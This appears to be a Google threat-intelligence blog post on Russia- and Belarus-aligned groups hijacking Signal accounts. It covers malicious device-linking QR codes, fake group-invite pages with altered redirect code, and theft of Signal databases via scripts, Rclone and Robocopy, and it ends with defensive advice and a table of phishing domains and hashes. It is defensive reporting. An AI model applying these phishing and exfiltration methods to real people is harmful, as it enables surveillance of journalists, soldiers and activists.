Signals of Trouble Multiple RussiaAligned Threat Actors Actively Targeting Signal Messenger Google Cloud Blog

pppWritten by Dan BlackppGoogle Threat Intelligence Group GTIG has observed increasing efforts from several Russia statealigned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russias intelligence services While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russias reinvasion of Ukraine we anticipate the tactics and methods used to target Signal will grow in prevalence in the nearterm and proliferate to additional threat actors and regions outside the Ukrainian theater of warppSignals popularity among common targets of surveillance and espionage activityâsuch as military personnel politicians journalists activists and other atrisk communitiesâhas positioned the secure messaging application as a highvalue target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements More broadly this threat also extends to other popular messaging applications such as WhatsApp and Telegram which are also being actively targeted by Russianaligned threat groups using similar techniques In anticipation of a wider adoption of similar tradecraft by other threat actors we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threatsppWe are grateful to the team at Signal for their close partnership in investigating this activity The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future Update to the latest version to enable these featuresppThe most novel and widely used technique underpinning Russianaligned attempts to compromise Signal accounts is the abuse of the apps legitimate linked devices feature that enables Signal to be used on multiple devices concurrently Because linking an additional device typically requires scanning a quickresponse QR code threat actors have resorted to crafting malicious QR codes that when scanned will link a victims account to an actorcontrolled Signal instance If successful future messages will be delivered synchronously to both the victim and the threat actor in realtime providing a persistent means to eavesdrop on the victims secure conversations without the need for fulldevice compromiseppIn remote phishing operations observed to date malicious QR codes have frequently been masked as legitimate Signal resources such as group invites security alerts or as legitimate device pairing instructions from the Signal websiteppIn more tailored remote phishing operations malicious devicelinking QR codes have been embedded in phishing pages crafted to appear as specialized applications used by the Ukrainian militaryppBeyond remote phishing and malware delivery operations we have also seen malicious QR codes being used in closeaccess operations APT44 aka Sandworm or Seashell Blizzard a threat actor attributed by multiple governments to the Main Centre for Special Technologies GTsST within Main Directorate of the General Staff of the Armed Forces of the Russian Federation GU known commonly as the GRU has worked to enable forwarddeployed Russian military forces to link Signal accounts on devices captured on the battlefield back to actorcontrolled infrastructure for followon exploitationppNotably this devicelinking concept of operations has proven to be a lowsignature form of initial access due to the lack of centralized technologydriven detections and defenses that can be used to monitor for account compromise via newly linked devices when successful there is a high risk that a compromise can go unnoticed for extended periods of timeppTo compromise Signal accounts using the devicelinking feature one suspected Russian espionage cluster tracked as UNC5792 which partially overlaps with CERTUAs UAC0195 has altered legitimate group invite pages for delivery in phishing campaigns replacing the expected redirection to a Signal group with a redirection to a malicious URL crafted to link an actorcontrolled device to the victims Signal accountppIn these operations UNC5792 has hosted modified Signal group invitations on actorcontrolled infrastructure designed to appear identical to a legitimate Signal group inviteppIn each of the fake group invites JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier URI used by Signal to link a new device to Signal ie sgnllinkdeviceuuid tricking victims into linking their Signal accounts to a device controlled by UNC5792ppFigure 1 Example modified Signal group invite hosted on UNC5792controlled domain signalgroupstechppFigure 2 Typical legitimate group invite code for redirection to a Signal groupppFigure 3 Example of UNC5792 modified redirect code used to link the victims device to an actorcontrolled Signal instanceppUNC4221 tracked by CERTUA as UAC0185 is an additional Russialinked threat actor who has actively targeted Signal accounts used by Ukrainian military personnel The group operates a tailored Signal phishing kit designed to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery guidance Similar to the social engineering approach used by UNC5792 UNC4221 has also attempted to mask its devicelinking functionality as an invite to a Signal group from a trusted contact Different variations of this phishing kit have been observed includingppPhishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate devicelinking instructions provisioned by Signal Figure 4ppPhishing websites with the malicious devicelinking QR code directly embedded into the primary Kropyvathemed phishing kit Figure 5ppIn earlier operations in 2022 UNC4221 phishing pages were crafted to appear as a legitimate security alert from Signal Figure 6ppFigure 4 Malicious devicelinking QR code hosted on UNC4221controlled domain signalconfirmsiteppFigure 5 UNC4221 phishing page mimicking the networking component of Kropyva hosted at tenetaaddgroupsite The page invites the user to Sign in to Signal Ukrainian ÐвÑоÑÐÐÑвÐÑÐÑÑ Ñ Signal which in turn displays a QR code linked to an UNC4221controlled Signal instanceppFigure 6 Phishing page crafted to appear as a Signal security alert hosted on UNC4221controlled domain signalprotecthostppNotably as a core component of its Signal targeting UNC4221 has also used a lightweight JavaScript payload tracked as PINPOINT to collect basic user information and geolocation data using the browsers GeoLocation API In general we expect to see secure messages and location data to frequently feature as joint targets in future operations of this nature particularly in the context of targeted surveillance operations or support to conventional military operationsppBeyond targeted efforts to link additional actorcontrolled devices to victim Signal accounts multiple known and established regional threat actors have also been observed operating capabilities designed to steal Signal database files from Android and Windows devicesppAPT44 has been observed operating WAVESIGN a lightweight Windows Batch script to periodically query Signal messages from a victims Signal database and exfiltrate those most recent messages using Rclone Figure 7ppAs reported in 2023 by the Security Service of Ukraine SSU and the UKs National Cyber Security Centre NCSC the Android malware tracked as Infamous Chisel and attributed by the respective organizations to Sandworm is designed to recursively search for a list of file extensions including the local database for a series of messaging applications including Signal on Android devicesppTurla a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the Federal Security Service FSB of the Russian Federation has also operated a lightweight PowerShell script in postcompromise contexts to stage Signal Desktop messages for exfiltration Figure 8ppExtending beyond Russia Belaruslinked UNC1151 has used the commandline utility Robocopy to stage the contents of file directories used by Signal Desktop to store messages and attachments for later exfiltration Figure 9ppFigure 7 Code snippet from WAVESIGN used by APT44 to exfiltrate Signal messagesppFigure 8 PowerShell script used by Turla to exfiltrate Signal messagesppFigure 9 Robocopy command used by UNC1151 to stage Signal file directories for exfiltrationppThe operational emphasis on Signal from multiple threat actors in recent months serves as an important warning for the growing threat to secure messaging applications that is certain to intensify in the nearterm When placed in a wider context with other trends in the threat landscape such as the growing commercial spyware industry and the surge of mobile malware variants being leveraged in active conflict zones there appears to be a clear and growing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of individuals who rely on secure messaging applications to safeguard their online activityppAs reflected in wide ranging efforts to compromise Signal accounts this threat to secure messaging applications is not limited to remote cyber operations such as phishing and malware delivery but also critically includes closeaccess operations where a threat actor can secure brief access to a targets unlocked device Equally important this threat is not only limited to Signal but also extends to other widely used messaging platforms including WhatsApp and Telegram which have likewise factored into the targeting priorities of several of the aforementioned Russiaaligned groups in recent months For an example of this wider targeting interest see Microsoft Threat Intelligences recent blog post on a COLDRIVER aka UNC4057 and Star Blizzard campaign attempting to abuse the linked device feature to compromise WhatsApp accounts  ppPotential targets of governmentbacked intrusion activity targeting their personal devices should adopt practices to help safeguard themselves includingppEnable screen lock on all mobile devices using a long complex password with a mix of uppercase and lowercase letters numbers and symbols Android supports alphanumeric passwords which offer significantly more security than numericonly PINs or patternsppInstall operating system updates as soon as possible and always use the latest version of Signal and other messaging appsppEnsure Google Play Protect is enabled which is on by default on Android devices with Google Play Services Google Play Protect checks your apps and devices for harmful behavior and can warn users or block apps known to exhibit malicious behavior even when those apps come from sources outside of PlayppAudit linked devices regularly for unauthorized devices by navigating to the Linked devices section in the applications settingsppExercise caution when interacting with QR codes and web resources purporting to be software updates group invites or other notifications that appear legitimate and urge immediate actionppIf available use twofactor authentication such as fingerprint facial recognition a security key or a onetime code to verify when your account is logged into or linked to a new deviceppiPhone users concerned about targeted surveillance or espionage activity should consider enabling Lockdown Mode to reduce their attack surfaceppCheck out this episode of The Defenders Advantage Podcast to hear Dan Black Principal Analyst Google Threat Intelligence Group and host Luke McNamara dive deeper into this research on Russiaaligned threat actors seeking to compromise Signal MessengerppCheck out this episode of The Defenders Advantage Podcast to hear Dan Black Principal Analyst Google Threat Intelligence Group and host Luke McNamara dive deeper into this research on Russiaaligned threat actors seeking to compromise Signal MessengerppTo assist organizations hunting and identifying activity outlined in this blog post we have included indicators of compromise IOCs in a GTI Collection for registered usersppSee Table 1 for a sample of relevant indicators of compromiseppActorppIndicator of CompromiseppContext ppUNC5792ppe078778b62796bab2d7ab2b04d6b01bfppExample of altered group invite HTML code ppaddsignalgroupcomppaddsignalgroupscomppgroupsignalcomppgroupssignalsiteppsignaldeviceoffonlineppsignalgroupaddcomppsignalgroupsiteppsignalgrouptechppsignalgroupsaddcomppsignalgroupssiteppsignalgroupstechppsignalsecurityonlineppsignalsecuritysiteppsignalgroupsiteppsignalsgroupcomppFake group invite phishing pagesppUNC4221ppsignalconfirmsiteppconfirmsignalsiteppDevicelinking instructions phishing pageppsignalprotecthostppFake Signal security alert pptenetajoingrouponlinepptenetaaddgroupsiteppgrouptenetaonlinepphelperanalyticsruppgrouptenetaonlinepptenetagroupppgroupkropyvasiteppFake Kropyva group invites ppAPT44pp1501073119418000ppDynamically generated devicelinking QR code provisioned by APT44ppa97a28276e4f88134561d938f60db495ppb379d8f583112cad3cf60f95ab3a67fdppb27ff24870d93d651ee1d8e06276fa98ppWAVESIGN batch scripts ppSee Table 2 for a summary of the different actors tactics and techniques used by Russia and Belarus statealigned threat actors to target Signal messagesppThreat Actor ppTactic ppTechniqueppUNC5792ppLinked deviceppRemote phishing operations using fake group invites to pair a victims Signal messages to an actorcontrolled deviceppUNC4221ppLinked deviceppRemote phishing operations using fake military web applications and security alerts to pair a victims Signal messages to an actorcontrolled deviceppAPT44ppLinked deviceppCloseaccess physical device exploitation to pair a victims Signal messages to an actorcontrolled deviceppSignal Android database theftppAndroid malware Infamous Chisel tailored to exfiltrate Signal database filesppSignal Desktop database theft ppWindows Batch script tailored to periodically exfiltrate recent Signal messages via RcloneppTurlappSignal Desktop database theft ppPostcompromise activity in Windows environmentsppUNC1151ppSignal Desktop database theft ppUse of Robocopy to stage Signal Desktop file directories for exfiltrationppBy Mandiant â 17minute readppBy Mandiant â 9minute readppBy Mandiant â 9minute readppBy Google Threat Intelligence Group â 25minute readp